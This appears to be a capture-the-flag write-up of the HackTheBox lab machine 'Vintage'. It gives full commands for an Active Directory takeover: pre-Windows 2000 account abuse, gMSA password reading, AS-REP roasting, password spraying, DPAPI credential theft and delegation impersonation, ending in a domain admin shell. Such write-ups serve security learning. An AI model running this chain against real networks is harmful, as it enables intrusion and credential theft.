Vintage#

vintage.png

Initial Enumeration#

nmap -sC -sV -Pn 10.10.11.45 -oN scans/nmap.initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-23 21:34 GMT
Stats: 0:02:17 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 36.68% done; ETC: 21:41 (0:03:57 remaining)
Stats: 0:06:18 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 21:41 (0:00:05 remaining)
Stats: 0:07:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 21:42 (0:00:00 remaining)
Nmap scan report for 10.10.11.45
Host is up (1.1s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-23 14:40:29Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-03-23T14:41:23
|_  start_date: N/A
|_clock-skew: -6h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 452.07 seconds

Windows auth is apparently disabled

nxc ldap 10.10.11.45 -u 'p.rosa' -p 'Rosaisbest123'

Trying to see if I can find some users, not really

kerbrute userenum \
  -d vintage.htb \
  --dc 10.10.11.45 \
  -o loot/valid_ad_users \
  /usr/share/seclists-git/Usernames/xato-net-10-million-usernames-dup.txt

Fails

smbclient -U 'p.rosa' --password 'Rosaisbest123' -L //10.10.11.45/

Fails

evil-winrm -i vintage.htb -u p.rosa -p 'Rosaisbest123'

We just get the domain out of that nothing more

python3 enum4linux-ng.py -As 10.10.11.45

Further dns enumeration

dig +short ANY @10.10.11.45 vintage.htb
10.10.11.45
dc01.vintage.htb.
dc01.vintage.htb. hostmaster.vintage.htb. 226 900 600 86400 3600

Sincing NTP with the controller

sudo ntpdate vintage.htb

We can get a TGT with rosa’s creds

getTGT.py vintage.htb/p.rosa:'Rosaisbest123'
export KRB5CCNAME=p.rosa.ccache

Fails

evil-winrm -i dc01.vintage.htb -r vintage.htb

Fails

psexec.py vintage.htb/p.rosa@vintage.htb -k -no-pass

But we can authenticate to ldap apparently

nxc ldap 10.10.11.45 -k --use-kcache

Enumeration AD/LDAP#

Using bloodhound.py to dump some ldap data for bloodhound

python3 /opt/BloodHound.py/bloodhound.py \
  -u 'p.rosa' \
  -p 'Rosaisbest123' \
  -d vintage.htb \
  -ns 10.10.11.45 \
  -c All \
  -k

Getting a list of users with powerview.py

python3 /opt/powerview.py/powerview.py \
  'vintage.htb/p.rosa:Rosaisbest123@dc01.vintage.htb' \
  -k
Get-DomainUser
cat users
administrator
guest
krbtgt
svc_ark
svc_ldap
svc_sql
l.bianchi_adm
c.neri_adm
p.rosa
c.neri
g.viola
l.bianchi
r.verdi
m.rossi

We could also have done it with ldapsearch

ldapsearch -x -LLL \
  -H ldap://10.10.11.45:389 \
  -b "CN=users,DC=vintage,DC=htb" \
  -D "p.rosa@vintage.htb" \
  -w "Rosaisbest123" \
  "(objectClass=user)" \
  sAMAccountName |\
grep sAMAccountName |\
cut -d' ' -f 2

Pre-windows 2000 compatible access#

Looking at things in bloodhound we can see that the AUTHENTICATED USERS group is a member of PRE-WINDOWS 2000 COMPATIBLE ACCESS as pointed out in the semperis blog as a being a default. This means all users including rosa can use that on the FS01 computer.

pre2k.png

Trying and failing to dump hashes with different tools. I think this doesn’t work because windows auth is disabled, and we need to authenticate via kerberos, which may not be working with those.

nxc ldap 10.10.11.45 -k --use-kcache -M pre2k
nxc ldap 10.10.11.45 -u 'p.rosa' -p 'Rosaisbest123' -M pre2k
pre2k auth -u 'p.rosa' -p 'Rosaisbest123' -dc-ip 10.10.11.45 -d ignite.local

Reading further on the trustedsec blog above I found out that by default checking the Assign this computer account as a pre-Windows 2000 computer box will create default computer accounts with a password matching the name of the computer in lowercase

So like that? Yes

getTGT.py \
  -dc-ip 10.10.11.45 \
  'vintage.htb/FS01$:fs01'
export KRB5CCNAME='FS01$.ccache'

FS01 has ReadGMSAPassword#

So we have a ticket as the FS01 computer account, lets look at bloodhound again to find what we might want to do with that.

gmsa.png

A gMSA or group Managed Service Account is a domain account that can be used to run services on multiple servers without having to manage the password. The gMSA provides automatic password management and simplified service principal name (SPN) management, including delegation of management to other administrators.

So when logged in as FS01 we should be able to read the password of the gMSA, or dump its hash.

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    get object 'GMSA01$' \
      --attr msDS-ManagedPassword

We can get a TGT as the gMSA based on the NT hash

getTGT.py \
  -dc-ip 10.10.11.45 \
  'vintage.htb/GMSA01$:' \
  -hashes ':5143*********************'
export KRB5CCNAME='GMSA01$.ccache'

gMSA genericWrite over servicemanagers#

Once again back to bloodhound, looking at the outbound object control for the gMSA, it does have addSelf, and genericWrite over the SERVICEMANAGERS group.

generic.png

So while logged in over kerberos as the gMSA, we can add p.rosa as a member of service managers.

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    add groupMember "SERVICEMANAGERS" "P.Rosa"

Servicemanagers genericWrite over system accounts#

This is helpful because servicemanagers has generic write over those 3 accounts acc.png

Get a TGT as rosa again

getTGT.py vintage.htb/p.rosa:'Rosaisbest123'
export KRB5CCNAME=p.rosa.ccache

Validate that we are indeed a member of servicemanagers

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    get membership p.rosa

A mentionned before we have genericWrite over a few service accounts, so we could add the DONT_REQ_PREAUTH User Account Control, to Kerberoast them later, let’s just sanity check this first and see if it is disabled on any of the users we know about. We’ll use the user list we have gathered in our ldap enumeration phase.

No it’s not disabled anywhere yet.

GetNPUsers.py \
  -dc-ip 10.10.11.45 \
  -usersfile loot/users \
  -request \
  vintage.htb/

Let’s disable it on all 3 accounts

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    add uac SVC_ARK \
      -f DONT_REQ_PREAUTH
bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    add uac SVC_LDAP \
      -f DONT_REQ_PREAUTH
bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    add uac SVC_SQL \
      -f DONT_REQ_PREAUTH

AS-Rep Roasting#

Now we can dump the as-rep hashes for them, except svc_sql, we get KDC_ERR_CLIENT_REVOKED

GetNPUsers.py \
  -dc-ip 10.10.11.45 \
  -usersfile loot/users \
  -request \
  vintage.htb/

This is because this account has the ACCOUNTDISABLE uac

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    get object SVC_SQL

Let’s just remove that

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    remove uac SVC_SQL \
     -f ACCOUNTDISABLE

And roast again, now we get an as-rep for all 3 accounts

GetNPUsers.py \
  -dc-ip 10.10.11.45 \
  -usersfile loot/users \
  -request \
  vintage.htb/

Lookup the correct hashcat mode for as-rep

hashcat --help|grep -i as-rep

And run rockyou through it

hashcat -m 18200 roast ~/.local/share/seclists/rockyou.txt 

We managed to crack the svc_sql account

hashcat -m 18200 roast ~/.local/share/seclists/rockyou.txt --show

Get a TGT with that…

getTGT.py vintage.htb/svc_sql:'Zer******'
export KRB5CCNAME=svc_sql.ccache

But as we saw on the initial nmap run there’s no mssql service running on this box, it does make sense, this account is disabled for a reason.

nxc mssql 10.10.11.45 -k --use-kcache

Password Reuse#

But the password might have been reused somewhere

kerbrute passwordspray \
  --dc vintage.htb \
  -d vintage.htb \
  loot/users \
  'Zer******'

And it has been reused indeed by the c.neri user

getTGT.py vintage.htb/c.neri:'Zer******'
export KRB5CCNAME=c.neri.ccache

Configure the realm properly

cat /etc/krb5.conf
[libdefaults]
    default_realm = VINTAGE.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    VINTAGE.HTB = {
        kdc = vintage.htb
        admin_server = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB

And we can now winrm as c.neri

evil-winrm -i dc01.vintage.htb -r vintage.htb

Stealing and Decrypting DPAPI Secrets#

.NET provides access to the Data Protection API (DPAPI), it is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords).

The data is stored in the users directory and is secured by user-specific master keys derived from the users password.

Stealing the Encryption Key#

The keys are usually located in:

  • C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID

The download helper of evil-winrm doesn’t work for me so, since those are pretty small anyway, I’m just encoding them in base64 to exflitrate them through the clipboard

Getting the SID and GUID for c.neri

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    get object c.neri
objectGUID: 486e5074-c6a2-476f-b4ba-5c8a925ef7e6
objectSid: S-1-5-21-4024337825-2033394866-2055507597-1115

Getting the key

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"))

Dropping it into my machine

wl-paste | base64 -d > C4BB96844A5C9DD45D5B6A9859252BA6

Stealing Encrypted Secrets#

DPAPI-protected secrets are typically located in:

  • C:\Users\$USER\AppData\Local\Microsoft\Credentials\

  • C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\

Looking around

cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
dir -h

Exfil

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"))

Dropping it into my own box

wl-paste | base64 -d > 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b

Decrypting the secrets#

The encryption key is password protected, but we already have the user’s password

dpapi.py masterkey \
  -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b \
  -sid S-1-5-21-4024337825-2033394866-2055507597-1115 \
  -password Zer******

Now with the key in plaintext for we can decrypt the secret and it’s the password for c.neri_adm

dpapi.py credential \
  -file C4BB96844A5C9DD45D5B6A9859252BA6 \
  -key 0xf*******************************************************************************************************************************
getTGT.py vintage.htb/c.neri_adm:'Uncr4ck4bl3P4ssW0rd0312'
export KRB5CCNAME=c.neri_adm.ccache

Cool, back to bloodhound.

C Neri Adm GenericWrite to DelegatedAdmins#

Same as usual we’re looking at the outbound object controls for c.neri_adm and it has generiWrite over a group called delegated admins

adm.png

Which means we can connect as c.neri_adm and add members to delegatedadmins, we’ll add svc_sql

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    add groupMember "DELEGATEDADMINS" "SVC_SQL"  

How is this helpful? Because since the sql service is disabled we can give it constrained access to a fake spn, and svc_sql will then be able to impersonate an admin when connecting to that service specifically.

Give svc_sql a fake spn

bloodyAD -k \
  --dc-ip 10.10.11.45 \
  --host dc01.vintage.htb \
  -d "VINTAGE.HTB" \
    set object "SVC_SQL" servicePrincipalName \
      -v "cifs/fake" 

Get a TGT as svc_sql again

getTGT.py vintage.htb/svc_sql:'Zer******'
export KRB5CCNAME=svc_sql.ccache

bianchi.png

Get a Service Ticket to that fake spn while impersonating another admin: l.bianchi_adm

getST.py -k \
  -spn 'cifs/dc01.vintage.htb' \
  -impersonate l.bianchi_adm \
  -dc-ip 10.10.11.45 \
  'vintage.htb/svc_sql:Zer******'
export KRB5CCNAME=l.bianchi_adm.ccache

And finally we can use that Service Ticket with wmi to get a shell as l.bianchi_admin

wmiexec.py vintage.htb/l.bianchi_adm@dc01.vintage.htb -k -no-pass 

That account is a member of the domain admins group, which gives us full admin on the dc.

admin.png